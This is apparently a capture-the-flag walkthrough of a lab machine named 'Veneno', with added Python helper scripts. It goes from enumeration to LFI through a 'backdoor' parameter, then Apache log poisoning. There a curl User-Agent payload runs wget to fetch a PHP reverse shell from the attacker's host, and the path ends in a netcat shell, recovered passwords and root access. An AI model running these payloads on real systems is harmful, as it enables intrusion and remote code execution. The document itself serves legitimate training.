# MAQUINA VENENO (parameter fuzzing - LFI - RCE via log poisoning)

Port, service and version enumeration.

```
nmap -p- --open --min-rate 3000 -n -Pn -sSCV 172.17.0.2 -oN fullservice.txt
22/tcp open ssh     OpenSSH 7.6p1 Ubuntu 3ubuntu13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 89:9c:7b:99:95:b6:e8:03:5a:6a:d4:69:69:4a:8d:35 (ECDSA)
|_  256 ec:ec:90:44:4e:66:64:22:f6:8b:cd:29:d2:b5:60:6a (ED25519)
80/tcp open http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Directory enumeration

```
nmap -p80 --script=http-enum.nse 172.17.0.2 -oN directory.txt
80/tcp open http
| http-enum:
|_  /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.58 (ubuntu)'
MAC Address: 02:42:AC:11:00:02 (Unknown)
```

Feroxbuster

```
feroxbuster -u http://172.17.0.2 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-1
```

| Status | Method | Lines | Words | Size   | URL / note                                                    |
| ------ | ------ | ----- | ----- | ------ | ------------------------------------------------------------- |
| 404    | GET    | 9l    | 31w   | 272c   | Auto-filtering found 404-like response and created new filter |
| 403    | GET    | 9l    | 28w   | 275c   | Auto-filtering found 404-like response and created new filter |
| 200    | GET    | 22l   | 105w  | 5952c  | http://172.17.0.2/icons/ubuntu-logo.png                       |
| 200    | GET    | 363l  | 961w  | 10671c | http://172.17.0.2/                                            |
| 200    | GET    | 363l  | 961w  | 10671c | http://172.17.0.2/index.html                                  |
| 301    | GET    | 9l    | 28w   | 310c   | http://172.17.0.2/uploads => http://172.17.0.2/uploads/       |
| 200    | GET    | 363l  | 961w  | 10671c | http://172.17.0.2/problems.php                                |

Parameter fuzzing against http://172.17.0.2/problems.php?FUZZ=/etc/passwd. problems.php returns the same 10671-byte page no matter what is sent, so `-fs 10671` filters that baseline out and only a parameter name that changes the response is reported:

```
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -u http://172.17.0.2/problems.php?FUZZ=/etc/passwd -fs 10671

backdoor                [Status: 200, Size: 1245, Words: 8, Lines: 26, Duration: 2ms]
```

Contents of /etc/passwd

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:996:996:systemd Resolver:/:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
carlos:x:1001:1001:,,,:/home/carlos:/bin/bash
```
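Added example (Python, written for this edit; it is not code from the original write-up). Once a parameter reads /etc/passwd it is worth parsing the response rather than eyeballing it: this pulls the passwd entries out of the HTTP body, confirms the LFI through the root entry (uid 0) and lists the accounts with a real login shell, which is how carlos stands out. The sample body is constructed; the HTML wrapper around the passwd text is an assumption, the page only shows the passwd lines.

```python
import re
from typing import Dict, List

# Constructed sample (not captured from the machine): a trimmed /etc/passwd as it
# comes back through problems.php?backdoor=/etc/passwd, wrapped in some HTML.
# The wrapper is an assumption; the page only shows the passwd text itself.
SAMPLE_BODY = """<html><body><pre>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
carlos:x:1001:1001:,,,:/home/carlos:/bin/bash
</pre></body></html>"""

# One passwd entry: name:password:uid:gid:gecos:home:shell (seven colon-separated fields).
PASSWD_LINE = re.compile(
    r"^([A-Za-z_][A-Za-z0-9_-]*):([^:\n]*):(\d+):(\d+):([^:\n]*):([^:\n]*):([^:\s]*)$",
    re.MULTILINE,
)

# Shells that do not give an interactive login.
NO_LOGIN_SHELLS = {
    "/usr/sbin/nologin", "/sbin/nologin", "/usr/bin/nologin", "/bin/false", "/bin/sync", "",
}


def parse_passwd(body: str) -> List[Dict[str, object]]:
    """Pull every well-formed passwd line out of an HTTP body, ignoring surrounding markup."""
    entries = []
    for m in PASSWD_LINE.finditer(body):
        name, _pw, uid, gid, gecos, home, shell = m.groups()
        entries.append({"name": name, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def is_lfi_hit(body: str) -> bool:
    """The LFI worked if the body contains the root entry (uid 0), present in every /etc/passwd."""
    return any(e["name"] == "root" and e["uid"] == 0 for e in parse_passwd(body))


def login_users(body: str) -> List[str]:
    """Accounts worth targeting next: those with a real shell."""
    return [e["name"] for e in parse_passwd(body) if e["shell"] not in NO_LOGIN_SHELLS]


if __name__ == "__main__":
    print("LFI confirmed:", is_lfi_hit(SAMPLE_BODY))
    print("login users:", login_users(SAMPLE_BODY))
```

The same `is_lfi_hit` check is a better ffuf success condition than a size filter alone: a parameter that changes the page size for some other reason (an error message, say) will not produce a uid-0 root line.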

Fuzzing the same parameter with an LFI wordlist to find other readable files: the Apache access log (/var/log/apache2/access.log) is readable, which is what makes log poisoning possible.

```
wfuzz -c --hc=404 --hw=0 -t 200 -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u "http://172.17.0.2/problems.php?backdoor=FUZZ"
```

| ID        | Response | Lines | Words  | Chars    | Payload                                             |
| --------- | -------- | ----- | ------ | -------- | --------------------------------------------------- |
| 000000648 | 200      | 530 L | 6261 W | 73529 Ch | "/var/log/apache2/access.log"                       |
| 000000650 | 200      | 528 L | 6237 W | 73251 Ch | "../../../../../../../var/log/apache2/access.log"   |

![](/files/OGhevUIUasyYLGL3MQPm)

Log poisoning

**Log poisoning** is a technique used by attackers to inject code

Since the log can be read through the LFI, I will inject PHP code into it with curl, carrying the payload in the User-Agent header so that Apache writes it into access.log:

```
curl -i -v 172.17.0.2 -A "<?php system('wget http://172.17.0.1:4000/shell.php -O /var/www/html/uploads/shell.php'); ?>"
```

![](/files/WOzU46xVhTJGvRLzS13C)

The request was accepted, so the payload is now in the log. The next step is to host the reverse shell on the attacker's HTTP server (port 4000) so that the `wget` in the payload can fetch it; in my case it was already hosted (ivan.php). Including the log through the vulnerable parameter then executes the injected PHP:

![](/files/amomqTkusX3nHOU6UqPY)

```
http://172.17.0.2/problems.php?backdoor=../../../../var/log/apache2/access.log
```
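Added example (Python, written for this edit, not part of the original write-up). Before triggering the include, a practitioner checks that the PHP reached access.log byte-for-byte; the same parser doubles as a detection rule for a defender reading that log. It parses Apache combined-format lines, flags entries with a PHP open tag in the request line, Referer or User-Agent, and verifies that the exact payload from the curl command above is present. The log lines are constructed; timestamps and sizes are illustrative.

```python
import re
from typing import Dict, List

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A PHP open tag in any logged field is what makes a line dangerous to include().
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)

# The payload used on the page (sent with curl -A).
PAYLOAD = "<?php system('wget http://172.17.0.1:4000/shell.php -O /var/www/html/uploads/shell.php'); ?>"

# Constructed sample (not a capture from the machine) of what
# problems.php?backdoor=../../../../var/log/apache2/access.log returns.
SAMPLE_LOG = (
    '172.17.0.1 - - [12/Jun/2025:21:01:12 +0000] "GET /problems.php?backdoor=/etc/passwd HTTP/1.1" 200 1245 "-" "Mozilla/5.0"\n'
    '172.17.0.1 - - [12/Jun/2025:21:03:40 +0000] "GET / HTTP/1.1" 200 10671 "-" "' + PAYLOAD + '"\n'
    '172.17.0.1 - - [12/Jun/2025:21:04:02 +0000] "GET /problems.php?backdoor=../../../../var/log/apache2/access.log HTTP/1.1" 200 73529 "-" "curl/8.5.0"\n'
)


def parse_combined(log_text: str) -> List[Dict[str, str]]:
    """Parse combined-format lines; lines that do not match are skipped, not guessed at."""
    entries = []
    for line in log_text.splitlines():
        m = COMBINED.match(line.strip())
        if m:
            entries.append(m.groupdict())
    return entries


def poisoned_entries(log_text: str) -> List[Dict[str, str]]:
    """Entries carrying a PHP open tag in an attacker-controlled field (request, referer, agent)."""
    return [e for e in parse_combined(log_text)
            if any(PHP_OPEN_TAG.search(e[field]) for field in ("request", "referer", "agent"))]


def payload_intact(log_text: str, payload: str) -> bool:
    """Confirm the payload reached the log verbatim before triggering the include.

    Apache backslash-escapes double quotes and backslashes inside logged headers, so a
    payload containing them would not come back byte-for-byte; the page's payload only
    uses single quotes, which is why it survives.
    """
    return any(e["agent"] == payload for e in parse_combined(log_text))


if __name__ == "__main__":
    for e in poisoned_entries(SAMPLE_LOG):
        print(f"{e['host']} [{e['time']}] poisoned user-agent: {e['agent']!r}")
    print("payload intact:", payload_intact(SAMPLE_LOG, PAYLOAD))
```

Two caveats the check makes visible: the include runs the PHP as the web server user (www-data here), so the `wget` only works because /var/www/html/uploads/ is writable by it; and every later read of the log through the LFI re-executes the payload, so one bad request in the poisoned line (for example a stray double quote) breaks the include for good and the log cannot be cleaned from the outside.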

![](/files/jMsmPzuxQ0kyvOBclRc5)

In the uploads folder the .php file was now present:

```
http://172.17.0.2/uploads/shell.php
```

![](/files/ouH3dPm6seXfeZRRHr7F)

I started a netcat listener and triggered the reverse shell.

![](/files/DymOTXtmTDfevYDO7AQo)

In /var/www/html there is this file. The note, in a mix of Spanish and Catalan, says roughly: "It's impossible for me to remember the password, it's unhackable, but I know I've had it in the same file for 24 years. Find it, look for it. I'm the only user on the system."

```
www-data@9c6fe7034c62:/var/www/html$ cat antiguo_y_fuerte.txt 
Es imposible que me acuerde de la pass es inhackeable pero se que la tengo en el mismo fichero desde fa 24 anys. trobala buscala 

soy el unico user del sistema.
```

With find I looked for a text file that might be the one the note refers to.

```
find / -type f -name "*.txt" 2>/dev/null
# /usr/share/viejuno/inhackeable_pass.txt contains: pinguinochocolatero
```

I switched to carlos with that password.

carlos's home directory contains many folders; listing everything with `ls -laR` turned up a hidden image:

```
./carpeta55:
total 624
drwxr-xr-x 2 root   root     4096 Jun 29  2024 .
drwxr-x--- 1 carlos carlos   4096 Jun 13 10:01 ..
-rw-r--r-- 1 root   root   627985 Jun 29  2024 .toor.jpg
```

Since python3 is installed on the victim, I started an HTTP server there to download the image.

```
carlos@9c6fe7034c62:~/carpeta55$ which python3
/usr/bin/python3
```

```
carlos@9c6fe7034c62:~/carpeta55$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/)
```

On Kali I download the file:

```
wget 172.17.0.2:8000/.toor.jpg
Prepended http:// to '172.17.0.2:8000/.toor.jpg'
--2025-06-12 21:05:56--  http://172.17.0.2:8000/.toor.jpg
Connecting to 172.17.0.2:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 627985 (613K) [image/jpeg]
Saving to: ‘.toor.jpg’

.toor.jpg    100%[==============================================================>]
```

With exiftool I look at the image metadata; the JPEG comment field holds a likely password.

```
exiftool .toor.jpg
ExifTool Version Number         : 13.25
File Name                       : .toor.jpg
Directory                       : .
File Size                       : 628 kB
File Modification Date/Time     : 2024:06:28 21:19:05-03:00
File Access Date/Time           : 2025:06:12 21:05:56-03:00
File Inode Change Date/Time     : 2025:06:12 21:05:56-03:00
File Permissions                : -rw-rw-r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Comment                         : pingui1730      <<<<<<<<<<< possible password
Image Width                     : 2048
Image Height                    : 2048
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
```
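Added example (Python, written for this edit, not from the original write-up). exiftool's `Comment` line is the JPEG COM segment, and it can be read without exiftool by walking the marker segments that precede the scan data; the same walk yields the frame header that gives `Image Width`/`Image Height`. The file here is a constructed stand-in for .toor.jpg (a minimal JFIF with a COM segment and a 2048x2048 baseline frame header), not the image from the machine.

```python
import struct
from typing import Iterator, List, Optional, Tuple

SOI, EOI, SOS, COM, APP0, SOF0 = 0xFFD8, 0xFFD9, 0xFFDA, 0xFFFE, 0xFFE0, 0xFFC0
# SOFn markers carry the frame header; C4 (DHT), C8 (JPG) and CC (DAC) sit in that range but are not SOF.
SOF_MARKERS = set(range(0xFFC0, 0xFFD0)) - {0xFFC4, 0xFFC8, 0xFFCC}


def _segment(marker: int, payload: bytes) -> bytes:
    """Marker + 16-bit big-endian length (which counts itself) + payload."""
    return struct.pack(">HH", marker, len(payload) + 2) + payload


def build_sample_jpeg(comment: str, width: int = 2048, height: int = 2048) -> bytes:
    """Constructed stand-in for .toor.jpg: JFIF APP0, a COM segment, a baseline SOF0
    frame header and an empty scan. Not the file from the machine."""
    jfif = b"JFIF\x00" + bytes([1, 1, 0]) + struct.pack(">HH", 1, 1) + b"\x00\x00"  # v1.01, no unit, 1x1
    sof0 = bytes([8]) + struct.pack(">HH", height, width) + bytes([3, 1, 0x11, 0, 2, 0x11, 1, 3, 0x11, 1])
    scan = _segment(SOS, bytes([3, 1, 0x00, 2, 0x11, 3, 0x11, 0, 0x3F, 0]))  # SOS header, no entropy data
    return (struct.pack(">H", SOI) + _segment(APP0, jfif) + _segment(COM, comment.encode("utf-8"))
            + _segment(SOF0, sof0) + scan + struct.pack(">H", EOI))


def iter_segments(data: bytes) -> Iterator[Tuple[int, bytes]]:
    """Walk the marker segments before the scan data, which is where all metadata lives."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        while pos + 1 < len(data) and data[pos + 1] == 0xFF:  # skip 0xFF fill bytes
            pos += 1
        if pos + 4 > len(data):
            return
        marker = struct.unpack(">H", data[pos:pos + 2])[0]
        if marker in (SOS, EOI):  # entropy-coded data follows SOS; stop here
            return
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError(f"bad segment length {length} at offset {pos}")
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def extract_comments(data: bytes) -> List[str]:
    """The COM segments, which exiftool reports as 'Comment'."""
    return [payload.rstrip(b"\x00").decode("utf-8", errors="replace")
            for marker, payload in iter_segments(data) if marker == COM]


def image_size(data: bytes) -> Optional[Tuple[int, int]]:
    """(width, height) from the first SOFn frame header, or None if none precedes SOS."""
    for marker, payload in iter_segments(data):
        if marker in SOF_MARKERS and len(payload) >= 5:
            height, width = struct.unpack(">HH", payload[1:5])
            return width, height
    return None


if __name__ == "__main__":
    jpg = build_sample_jpeg("pingui1730")
    print("comments:", extract_comments(jpg))
    print("size:", image_size(jpg))
```

Run it against the real file with `extract_comments(open(".toor.jpg", "rb").read())`; a COM segment is plain text in the file, so `strings` would also have shown it, but the walker tells you which segment the text lives in and stops at the scan data instead of dumping image noise.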

With the password from the image comment I switched to root:

```
carlos@9c6fe7034c62:~/carpeta55$ su root
Password:
root@9c6fe7034c62:/home/carlos/carpeta55# whoami
root
```
